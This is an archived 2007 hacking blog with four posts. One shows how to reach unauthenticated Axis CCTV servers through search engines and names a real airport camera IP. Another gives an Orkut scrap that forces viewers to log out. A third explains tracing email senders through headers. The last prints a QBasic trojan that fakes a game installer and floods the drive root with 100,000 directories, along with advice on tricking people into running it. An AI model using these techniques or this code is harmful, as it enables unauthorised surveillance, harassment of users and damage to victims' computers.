Friday, December 7, 2007

Increasing the span of my vision


All of us hackers must have seen the movie: Die Hard 4, which demonstrates, among all other things, the breaking of the villains into CCTV cameras, during the whole movie. At first I thought it is not possible, but then, I leapt into the field of CCTV hacking, and what I eventually found out is what I am about to write in the next few paragraphs.

CCTV cameras are everywhere. In airports, in hospitals, in schools, in hostels, in offices, restaurants, government buildings, and where not!!!

CCTV cameras have a built in web server, which streams data on the World Wide Web. Yes, the WWW. And that's what we make use of. We can search for the vulnerable cams. If the web server is not set to avoid search engine crawls, then we can search it and access the cameras and see whatever is going on. Something I call - seeing the world.

So, all we have to do, is search for all those vulnerable CCTV cameras, and just access it. That's it - no passwords, no authentication. All you gotta know is the IP of the camera. The IP assigned to the camera. Every camera server has its IP. And the location of the file, that streams the contents of the camera. We can access multiple cameras through the same server, depending on whether or not the server gives us access to the camera argument. The server running is the Axis 2400 servers. That is, all we have to know is the vulnerability. I have to do more research on these stuffs, before I can tell how to do more advanced stuffs.

The main theory behind this type of surveillance is that, the file stored in these servers is located somewhere in the /axis-cgi/mjpg or the /axis-cgi/jpg directories. The files may be of the type swf (Flash movies) or it could be a cgi script. The root of this camera may also provide multi camera views and some administrative setups as well, which obviously is more fun.


This is coming in the search string, when we search for the vulnerable cams. In this demo, I'll give you the IP of the CCTV server in the Stuttgart airport in Germany. The IP is 195.243.185.195 and here's a screen shot of that airport's various cameras:

Just make sure you don't do anything stupid enough to drive the German cops to your home!!!
;)
Till then, happy surveillance!!!

Thursday, December 6, 2007

Yet another orkut trick.....



Well, yet another nasty javascript for the Orkut users. Write this to your scrap, and if the user is on the same page, as this scrap, then he/she will get logged out. As can be seen, there is an embedding of an object, which is used to log out the user
"http://www.orkut.com/GLogin.aspx?cmd=logout"
Here, it is the active server page we are exploiting, by calling the cmd argument with a value of logout. This works the trick...
Try it!!!
Comments and suggestions are most welcome...
:)

Tuesday, December 4, 2007

Tracking down an email



Email tracing has been one of the prime considerations of the authorities. It has been the most basic task of the authorities, in the tracing of a mail, down to the door. And not surprisingly, it is also, the most easy thing to do. Though the amount of information is very limited, but still, this can provide the IP of the sender at the time of the mail sending, and that's no less than an important achievement.

This is accomplished by studying the email headers. If the IP is from a registered network, then we can know the exact location of the sender, along with the street address, but is it a personal internet connection, we can only know the name of the company, which the sender is sending from, that is the ISP(Internet Service Provider).

Now, we get to the real thing. We consider an example email header, from which, we trace the mail back to the sender.

Here's a sample mail header:

This one is the header of a mail from McAfee.
Example 1

From McAfee Fri Aug 24 04:11:46 2007
X-Apparently-To: xtreme_the_great1@yahoo.co.in via 202.43.219.101; Sat, 25 Aug 2007 21:45:41 +0530
X-Originating-IP: [216.49.92.103]
Return-Path:
Authentication-Results: mta125.mail.in.yahoo.com from=mcafee.com; domainkeys=neutral (no sig)
Received: from 216.49.92.103 (HELO mcafee.com) (216.49.92.103) by mta125.mail.in.yahoo.com with SMTP; Sat, 25 Aug 2007 21:45:40 +0530
X-Mailer: UnityMail
Errors-To:
Originator:
X-Mailer-Version: 5.1.182
X-UnityID: <20070823224146.hxfcjbysebaaa3aumail4.xtreme_the_great1@yahoo.co.in@unity4.mcafee.com>
X-UnityUser: McAfee
Reply-to: "McAfee"
From:"McAfee" Add to Address BookAdd to Address Book
To:"xtreme_the_great1@yahoo.co.in"
Subject: McAfee Security Brief 08.07: Microsoft Vulnerabilities
Date: Thu, 23 Aug 2007 15:41:46 -0700
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="----=_NextPart_000_0963_01C7E5D6.C90B46F0"
Thread-Index: AcfmEXVgCOCwhz8cS5K6y62QtMC7QQ==
Content-Class: urn:content-classes:message
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1807
Content-Length: 19546


The X-originating IP is the IP of the mail server, that is the smtp server used in the process. These servers, are the machines, that are used for sending mails in the Internet. In this case, it is 216.49.92.103. The sending machine's IP can also be figured out from the mail header itself. We can figure it out by examining the Received fields, which in this case reads:

Received: from 216.49.92.103 (HELO mcafee.com) (216.49.92.103) by mta125.mail.in.yahoo.com with SMTP; Sat, 25 Aug 2007 21:45:40 +0530

The sending IP here is thus, the same as that of the first mail server used in the process. That is: 216.49.92.103.

But, cases may not be like this.

We consider another case, where there are multiple mail servers used in the process.


Example 2

X-Apparently-To: xtreme_the_great1@yahoo.co.in via 202.43.219.149; Sun, 25 Mar 2007 18:02:32 +0530
X-Originating-IP: [202.43.219.31]
Return-Path:
Authentication-Results: mta135.mail.in.yahoo.com from=yahoo.co.in; domainkeys=pass (ok)
Received: from 202.43.219.31 (HELO web8316.mail.in.yahoo.com) (202.43.219.31) by mta135.mail.in.yahoo.com with SMTP; Sun, 25 Mar 2007 18:02:32 +0530
Received: (qmail 84649 invoked by uid 60001); 25 Mar 2007 12:32:32 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.co.in; h=X-YMail-OSG:Received:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding:Message-ID; b=0s8bAtp2vC7RFSCYSfLno7bSWfAP6ebccb/weUTLZiw/rWfNuCgFdZvZUc9iMyUkgYuxqjz7WX3LqbMS8L8Qpyg4sM+M+BR2YQt50I330raEEFk5kuAjjGCNOZBe8zFphRNtIeAsOFJ8keIEQ+0kzbPdJQ0xuon7g7mDTyJv0Tw=;
X-YMail-OSG: jC_yrKkVM1n7FtpNbkqEXJdYRgDvi3PDe0HUOmSPKTBwyHwm_1crZ.fBVw6xODaYBudsxpwFsOtmkF6_lYfGUTo.FBDkKgfTLsoHun6qK.irkJFE.QqhNsPs2JfHOpVQDVVdACQ4HUZ7A9SFDqR7KA6pTw--
Received: from [122.168.69.140] by web8316.mail.in.yahoo.com via HTTP; Sun, 25 Mar 2007 13:32:31 BST
Date: Sun, 25 Mar 2007 13:32:31 +0100 (BST)
From:Send an Instant Message "sooraj elamana" Add to Address BookAdd to Address Book
Yahoo! DomainKeys has confirmed that this message was sent by yahoo.co.in. Learn more
Subject: Proxy Lists by Sooraj E
To:xtreme_the_great1@yahoo.co.in
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="0-575879626-1174825951=:84636"
Content-Transfer-Encoding: 8bit
Message-ID: <34533.84636.qm@web8316.mail.in.yahoo.com>
Content-Length: 58637

Here, we see the Received fields, and deduce, what we are supposed to deduce.: The IP of the sender, at the time of sending the message. The X-Originating IP is 202.43.219.31, which is the IP of the first mail server in the path. Then we come to the point.

The first Received field says, that the message was obtained from 202.43.219.31 a.k.a. web8316.mail.in.yahoo.com, that is, the computer introduced itself to the mail server mta135.mail.in.yahoo.com as web8316.mail.in.yahoo.com.

The second one says, that the message was obtained from 122.168.69.140 by web8316.mail.in.yahoo.com via HTTP, that is, the sender used a web browser, to send the email.

Then, to find more information about the sender, we lookup the obtained IP 122.168.69.140 with the nslookup command, which returns the following:

Name: ABTS-MP-dynamic-140.69.168.122.airtelbroadband.in
Address: 122.168.69.140

That is the sender's ISP is Airtel broadband, and he is situated in India, in the state Madhya Pradesh (Deduced from the ABTS-MP) and the IP is a dynamic IP address, that is the next time the sender logs on to the ISP, he'll have a new IP.

In the next post, I'll demonstrate how I traced down a sender to his college, and got a phone number, so that I could talk to him! Keep checking. :)

Saturday, December 1, 2007

Worms.

A worm is a computer program that has the ability to copy itself from machine to machine. They are basically malicious codes like Virus or Trojans. Worms often have some sort of evil intent. They mainly use up computer time and network bandwidth when they are replicating.

Unlike a virus, it does not need to attach itself to an existing program. Worms always harm the network (if only by consuming bandwidth), whereas viruses always infect or corrupt files on a targeted computer.Worms can expand from a single copy incredibly quickly .

A worm usually exploits some sort of security hole or some bug in the software or the OS. Some famous worms are Mydoom ,So big( both spreading via email) and Code Red(effecting via whitehouse.gov) .

All about viruses n worms...

This is a little trojan written in Qbasic 4.5

REM bitch by Spear
color 14,0
print"installing datafiles... Please wait..."
print"This may take up to 20 minutes, depending on your computer..."
shell "cd\"
for a = 1 to 100000
a$=str$(a)
c$="md" + a$ + ".hee"
shell c$
next a
cls
print"Cybermattixx Version 1.0 is now installed on your system..."
print"Have a sh*tty day!"
print " ?AM?"
print
input "Hit ENTER To REBOOT your System now!";a$
shell "boot.com"

How to use it?
This can pose as the installation program for a game. This means that
when you upload it to a BBS or something, and post that it is a
kickass game, people will download it and try to install it on their
computers!

What does it do?
This program changes directory to the root and makes 100000 dirs in
the root. You cannot use deltree to wipe them out in one chunk and
you CANNOT get rid of them without doing reverse engineering on the
program, ie. rd instead of md. To get rid of them any other way you
would have to format c: or d: (with help....)